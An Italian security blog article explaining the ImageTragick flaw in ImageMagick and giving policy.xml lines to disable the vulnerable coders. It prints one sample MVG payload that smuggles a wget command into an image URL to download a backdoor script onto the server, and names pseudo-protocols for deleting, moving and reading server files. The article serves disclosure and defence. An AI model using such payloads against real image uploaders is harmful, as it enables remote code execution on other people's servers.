19 Novembre 2025
HomeAttualitàImageMagick. Il tuo sito è al sicuro dal bug ImageTragick?

ImageMagick. Il tuo sito è al sicuro dal bug ImageTragick?

ImageMagick è un popolare software utilizzato per convertire, modificare e manipolare le immagini. Ha librerie per tutti i linguaggi di programmazione comuni, tra cui PHP, Python, Ruby e molti altri. È anche molto semplice da usare, questo lo ha portato ad essere utilizzato da molti sviluppatori quando necessitano di opzioni di ritaglio dell’immagine o manipolazione di foto.

È anche possibile utilizzare ImageMagick per aggiungere annotazioni di testo alle immagini, ad esempio con l’aggiunta di una barra grigia nella parte inferiore con un avviso di copyright; per eseguire la correzione automatica del colore; per affinare la messa a fuoco di una serie di immagini; per la produzione di GIF animate per siti web; e altro ancora.

ImageMagick supporta anche diversi linguaggi di scripting come MSL (Magick Scripting Language) e MVG (Vector Graphics Magick), che consentono di descrivere le immagini, in entrambi i formati pixel-based e vettoriali.

Tuttavia, le ultime versioni di ImageMagick non filtrano correttamente i nomi dei file che vengono passati alle funzioni che gestiscono i protocolli esterni (come HTTPS). Questo permette a un attacker di eseguire i comandi a distanza caricando un’immagine. Il che porta ad una vulnerabilità RCE completa (esecuzione di comando remoto) nell’uploader di immagini. La vulnerabilità è così grave che i ricercatori hanno creato un divertente nick name più facile da ricordare al posto del codice CVE-2.016-3.714 ovvero ImageTragick.

 

Come funziona il bug ImageMagick

La vulnerabilità è molto semplice da sfruttare, un attaccante ha bisogno solo di uno strumento: l’uploader di un’immagine per fare leva sul codice di ImageMagick. Ci sono molte applicazioni web popolari e prodotti SaaS vulnerabili. Purtroppo, anche con tutta l’attenzione dei media, non tutti sono a conoscenza di questo problema.

Approfondendo questa vulnerabilità può effettivamente essere divisa in 4 diverse fasi, come ha spiegato molto bene Karim Valiev dal team Security Mail.Ru in questa discussione.

  1. Esecuzione di un comando a distanza attraverso upload di file MVG / .svg . Tramite un file un aggressore può forzare un comando di shell da eseguire sul server. Questo è un esempio molto semplice di come può funzionare:
    immagine su 0,0 1,1 'url (https: "; wget" http://pastebin.com/raw/badpastebin "-O /home/vhosts/file/backdoor.pl")'

    Quando viene aggiunto un file MVG, il comando wget viene eseguito e l’output del file salvato su pastebin in backdoor.pl.

  2. Cancellazione del file remoto. Quando si utilizza il pseudo protocollo “ephemeral:/” un utente malintenzionato può rimuovere i file sul server
  3. Spostamento di un file remoto: simile alla sua eliminazione, ma quando si utilizza il pseudo protocollo ” MSL: / “, l’attaccante può spostare i file
  4. La divulgazione dei file contenuti nel server quando si utilizza il protocollo ” label: @ “.

Quando si combinano tutti questi bug, gli attaccanti hanno una vasta gamma di opzioni e strumenti per compromettere una applicazione web che sfrutta ImageMagick. Si noti che solo il filtraggio per l’estensione MGV non è sufficiente, in quanto qualsiasi formato di file verrà ispezionato e il comando eseguito.

Si fa notare inoltre che altri strumenti IDS non rilevano e questo problema.

Come proteggere il vostro sito

Gli utenti dietro un WAF (Web Application Firewall) sono già protetti contro questa vulnerabilità, ma si consiglia comunque a tutti di seguire le raccomandazione degli sviluppatori ImageMagick e di modificare il file /etc/ImageMagick/policy.xml e disabilitare l’elaborazione delle MVG, HTTPS, EPHEMERAL, e MSL.

Nella parte seguente, aggiungere le righe:

<policy domain="coder" rights="none" pattern="EPHEMERAL" />
<policy domain="coder" rights="none" pattern="HTTPS" />
<policy domain="coder" rights="none" pattern="MVG" />
<policy domain="coder" rights="none" pattern="MSL" />

Se non è possibile effettuare tali modifiche, disabilitare immediatamente la funzionalità di caricamento delle immagini,  fino a quando è possibile patchare correttamente. Meglio prevenire che curare.

Questo articolo è stato redatto seguendo le indicazioni fornite da Sucuri Security, Sophos, e ImageMagik. Qualsiasi novità verrà aggiunta a questo post aggiornandolo. Potete anche chiedere informazioni più specifiche o altri aiuti, per quello che possiamo aiuteremo a capire meglio questo pericolosa vulnerabilità.

Alex Trizio
Alex Triziohttps://www.alground.com
Alessandro Trizio è un professionista con una solida expertise multidisciplinare, che abbraccia tecnologia avanzata, analisi politica e strategia geopolitica. Ora è Amministratore e Direttore Strategico del Gruppo Trizio, dirigendo il dipartimento di sicurezza informatica. La sua competenza si estende all'applicazione di soluzioni innovative per la sicurezza cibernetica e la risoluzione di criticità complesse.
Altri articoli

TI POSSONO INTERESSARE

Trump abbraccia bin-Salman: quando il trilione di dollari vale più di un cadavere fatto a pezzi

Il riavvicinamento tra Donald Trump e Mohammed bin Salman del 18 novembre 2025 è un esercizio di realismo geopolitico spinto fino al cinismo estremo. I...

Analisi del Malfunzionamento Globale di Cloudflare

Il 18 novembre 2025, Cloudflare, un fornitore di infrastruttura internet, ha subito una grave interruzione globale del servizio. L'incidente è iniziato intorno alle 11:20...

Musulmani per Roma 2027: nasce il primo gruppo politico islamico nella Capitale

Nella città eterna, cuore della cristianità e capitale d'Italia, sta prendendo forma un fenomeno politico senza precedenti che promette di ridisegnare gli equilibri delle...

Il genocidio sudanese raccontato da una sopravvissuta che il mondo ignora

Davanti ai banchi del Consiglio di Sicurezza delle Nazioni Unite, Niemat Ahmadi ha portato le voci di milioni di donne sudanesi vittime di una...

Jiu Tian: la Cina lancia la prima “portaerei” volante

Nel panorama della tecnologia militare moderna, la Cina si prepara a introdurre un velivolo che potrebbe ridefinire completamente le strategie di combattimento aereo. Il...

Gaza tra due piani di pace: Russia sfida l’America all’ONU e apre allo Stato palestinese

Il nuovo scenario diplomatico sulla crisi di Gaza sta vivendo una svolta senza precedenti. La Russia ha presentato una sua risoluzione al Consiglio di...

I “Cecchini del Weekend” di Sarajevo: l’Inchiesta Italiana sui Safari Umani durante l’Assedio

Durante l'assedio di Sarajevo, uno dei più lunghi e tragici della storia moderna, si consumava un orrore che solo oggi viene alla luce con...

Aggressione a Cicalone, lo youtuber anti borseggiatori della metro di Roma

Sono di ieri sera le immagini dall’ospedale che testimoniano la nuova "aggressione metropolitana" a Simone Ruzzi, in arte Cicalone, e le parole della sua...

Ucraina: scoppia il caso Energoatom. Corruzione e Stato

Dalla maxi-inchiesta sul colosso energetico Energoatom alle riforme anticorruzione in tempo di guerra. Nuove delicate sfide per Zelensky e la sua amministrazione. Due guerre,...